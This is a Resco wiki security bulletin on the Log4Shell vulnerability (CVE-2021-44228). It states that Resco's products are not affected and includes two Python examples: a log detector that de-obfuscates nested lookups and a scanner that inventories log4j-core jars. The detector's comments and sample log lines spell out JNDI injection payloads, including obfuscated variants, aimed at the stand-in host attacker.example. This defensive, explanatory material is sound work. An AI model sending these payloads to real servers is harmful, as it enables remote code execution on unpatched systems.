Security bulletin

From Resco's Wiki
This page shows Resco's analyses of publicly disclosed vulnerabilities with potential impact on Resco products and services.

CVE-2021-44228 (Log4J vulnerable to remote code execution)

Security issue: Log4J vulnerable to remote code execution
Date: December 14, 2021
Affected platforms: None
Severity: Low

This page answers frequently asked questions related to the vulnerability CVE-2021-44228 (Log4J vulnerable to remote code execution).

Resco’s cloud services and mobile applications are NOT vulnerable.

While analyzing the situation, we applied the guidelines posted by NCC Group and Microsoft's mitigation guidance for its services.

We will continue monitoring the situation and keep this page updated should we come to newer conclusions.

Vulnerability

The vulnerability, widely known as Log4Shell, affects the Apache Log4j 2 logging library (versions 2.0-beta9 through 2.14.1). It was publicly disclosed on 9 December 2021, with working exploit code circulating the same day. Log4j 2 expands ${...} lookup expressions found in logged messages; an attacker who can get a string such as ${jndi:ldap://attacker-host/a} into any field that ends up in a log (an HTTP User-Agent header, a username, a chat message) makes the server perform a JNDI lookup against an attacker-controlled server and load a remote Java class. The result is remote code execution with the privileges of the logging process, which in practice often means full access to the affected server.

For more information, we recommend Microsoft’s Security Response Center.

If you are interested in reproducing the vulnerability, you can visit christophetd’s sample code (run it only in an isolated, non-production sandbox environment, at your own risk).
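Because the trigger is a string in a log message, the first thing most teams did was search logs for "${jndi:". That literal search misses the obfuscated forms attackers used within hours, such as ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...}, which Log4j resolves before the JNDI lookup runs. The following Python detector is an added example written for this page, not Resco's code: it normalizes the two obfuscation idioms that need no runtime state (lower/upper lookups and the ":-default" fallback of a failed lookup) and then matches the JNDI prefix case-insensitively, as Log4j does. The sample access-log lines, IP addresses and the host attacker.example are constructed for the example.

```python
import re

# Log4j 2 expands ${...} lookups inside logged messages. The Log4Shell payload
# is a JNDI lookup, but attackers hide the keyword behind nested lookups that
# Log4j resolves first, e.g.
#   ${${lower:j}ndi:ldap://attacker.example/a}
#   ${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}
# The normaliser below resolves the idioms that need no runtime state:
# ${lower:x} / ${upper:x} and the ":-default" fallback of a failed lookup.

INNERMOST = re.compile(r"\$\{([^{}]*)\}")           # a lookup with no nested lookup inside
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)  # Log4j matches the prefix case-insensitively


def _resolve(body):
    """Resolve one lookup body (the text between ${ and }); None if it needs runtime state."""
    default = None
    if ":-" in body:                      # ${name:-default}
        body, default = body.split(":-", 1)
    prefix, sep, key = body.partition(":")
    prefix = prefix.lower()
    if sep and prefix == "lower":
        return key.lower()
    if sep and prefix == "upper":
        return key.upper()
    if default is not None:               # unknown or failed lookup falls back to its default
        return default
    return None                           # e.g. jndi:, date:, env: without a default: keep as-is


def normalize(text, max_rounds=50):
    """Repeatedly resolve innermost lookups until nothing can be simplified further."""
    def repl(m):
        resolved = _resolve(m.group(1))
        return m.group(0) if resolved is None else resolved

    for _ in range(max_rounds):
        new = INNERMOST.sub(repl, text)
        if new == text:
            break
        text = new
    return text


def is_log4shell(text):
    """True if the text, once de-obfuscated, contains a JNDI lookup."""
    return JNDI.search(normalize(text)) is not None


def scan_lines(lines):
    """Return (index, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((i, norm))
    return hits


# Constructed sample access-log lines (TEST-NET-3 addresses, fictitious host).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:03:14:07 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 1024 "-" "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://attacker.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:03:14:12 +0000] "GET / HTTP/1.1" 200 1024 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '203.0.113.12 - - [10/Dec/2021:03:14:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 99 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for idx, norm in scan_lines(SAMPLE_LOG):
        print(f"line {idx}: {norm}")
```

Lines 1 to 3 of the sample are flagged and all normalize to a plain ${jndi:...} lookup; the benign ${date:yyyy} on the last line is left alone. The normalizer is deliberately conservative: lookups that depend on runtime state (env, sys, ctx) are kept verbatim rather than guessed, so a ${jndi:...} wrapped around them is still caught while nothing is invented about the victim's environment.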

Impact on Resco Cloud products

Resco Cloud products are NOT vulnerable.

Our Resco Cloud security team has analyzed all our cloud services. Resco Cloud does not use any vulnerable version of Log4J and, to the best of our knowledge, Resco Cloud was at no time exposed to this exploit. We will continue our analysis and update this information if needed.

Some instances of Resco Cloud run on Amazon AWS, where Amazon OpenSearch Service was affected by this vulnerability. We use OpenSearch only for monitoring Resco Cloud services. We have updated the affected libraries following Amazon’s guidance and have mitigated the vulnerability. It is also important to understand that OpenSearch is a monitoring component: even a compromised OpenSearch instance does not provide access to Resco Cloud services.
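The statement that no vulnerable Log4J version is in use rests on an inventory of every log4j-core jar actually deployed, including jars bundled inside web applications and the copies shipped with third-party components such as search and monitoring stacks. The following Python scanner is an added example written for this page, not Resco's tooling: it walks a directory tree, reads the Maven pom.properties that log4j-core jars carry to get the version, checks whether JndiLookup.class is present (its removal was Apache's documented mitigation for unpatched versions), and descends into nested archives. The sample jars it scans are constructed in a temporary directory with only the two entries the scanner reads and an empty placeholder instead of real bytecode.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1). Pre-release tags are dropped, so '2.0-beta9' -> (2, 0, 0);
    this also flags 2.0-beta8 and earlier, which Apache lists as unaffected (deliberate over-report)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(n or 0) for n in m.groups()) if m else None


def classify(version):
    """CVE-2021-44228 status of a log4j-core version string."""
    v = parse_version(version)
    if v is None:
        return "unknown"
    if v < (2, 0, 0):
        return "Log4j 1.x: not affected by CVE-2021-44228"
    if v < (2, 15, 0):
        return "VULNERABLE to CVE-2021-44228"
    if v < (2, 16, 0):
        return "fixed for CVE-2021-44228, incomplete (CVE-2021-45046)"
    return "fixed"  # Apache's recommended release at the time was 2.17.1 for Java 8


def inspect_archive(zf, label):
    """Report log4j-core inside one open archive, descending into bundled jars (e.g. WEB-INF/lib)."""
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    findings = []
    has_jndi = JNDI_CLASS in names
    if version or has_jndi:
        status = classify(version) if version else "JndiLookup.class present, version unknown"
        if status.startswith("VULNERABLE") and not has_jndi:
            status = "vulnerable version, but JndiLookup.class removed (mitigated)"
        findings.append({"archive": label, "version": version,
                         "jndi_lookup_present": has_jndi, "status": status})
    for inner in sorted(names):                 # one archive nested in another
        if inner.endswith(ARCHIVES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(inner))) as inner_zf:
                    findings.extend(inspect_archive(inner_zf, f"{label}!{inner}"))
            except zipfile.BadZipFile:
                pass
    return findings


def scan_tree(root):
    """Walk a directory tree and inspect every archive found."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in ARCHIVES:
            with zipfile.ZipFile(path) as zf:
                findings.extend(inspect_archive(zf, str(path.relative_to(root))))
    return findings


def build_fake_jar(version, include_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar: only the two entries the scanner
    reads, with an empty placeholder for the class (not real bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"")
    return buf.getvalue()


def demo():
    """Build a small constructed tree in a temp dir, scan it, and return the findings."""
    root = Path(tempfile.mkdtemp())
    (root / "log4j-core-2.14.1.jar").write_bytes(build_fake_jar("2.14.1"))
    (root / "log4j-core-2.17.1.jar").write_bytes(build_fake_jar("2.17.1"))
    with zipfile.ZipFile(root / "app.war", "w") as war:  # jar bundled in a web app, class stripped
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", build_fake_jar("2.14.1", include_jndi=False))
    return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['archive']}: log4j-core {f['version']} -> {f['status']}")
```

Two caveats matter when reading the output. A 2.15.0 jar is reported as an incomplete fix because that release still allowed JNDI lookups in some non-default configurations (CVE-2021-45046), so upgrading to 2.16.0 or later is the actual fix. And a vulnerable version with JndiLookup.class removed is reported as mitigated, not fixed: the mitigation is sound for CVE-2021-44228, but the jar should still be upgraded.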

Impact on Resco Mobile Apps

Resco mobile apps available from the Apple, Microsoft, and Google app stores are NOT vulnerable to the Log4J vulnerability.